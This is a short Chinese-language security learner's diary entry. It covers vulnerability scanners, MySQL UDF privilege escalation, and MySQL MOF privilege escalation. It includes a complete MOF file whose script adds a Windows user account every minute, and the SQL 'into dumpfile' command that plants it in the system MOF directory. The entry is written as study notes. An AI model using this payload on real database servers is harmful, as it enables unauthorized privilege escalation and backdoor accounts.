假期都比较混
0x00 关于漏洞扫描(又是用了大量时间)
- 工具例如awvs,好像挺强大,但是我没怎么用它找到过漏洞。扫了一晚上,起来发现两个高危(vulnerable javascript library),查了一圈,好像是说可以定义为敏感信息泄露,但是没啥利用价值(现在先这么说)
- 工具例如brutexss,也是没啥大用(一个我发现的漏洞都检测不出),最重要的在我看来还是payload的量,扫描器代码作为小型的应该没有多大差距
0x01 MySQL提权之UDF提权
晚上复习了一下UDF提权
UDF的表现形式都是以dll形成mysql的插件
数据库版本为 5.0 以下的:
如果是 win2000 的服务器,则需要将 udf.dll 文件导出到 C:\Winnt\udf.dll 下。
如果是 win2003 服务器,则要将 udf.dll 文件导出在 C:\Windows\udf.dll 下。
数据库版本为 5.1 以上的:
需要将 dll 文件导出到 mysql 安装目录的 lib\plugin\ 下,才能创建自定义函数。如果没有 plugin 目录,需要进行手动创建
select @@basedir; # 显示mysql路径
0x02 MySQL提权之MOF提权
又复习了下MOF提权
利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,写入cmd命令执行
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user [username] [password] /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
0x03 FLAG
两天内写个iptables设置防火墙docker实现(->在这里<-)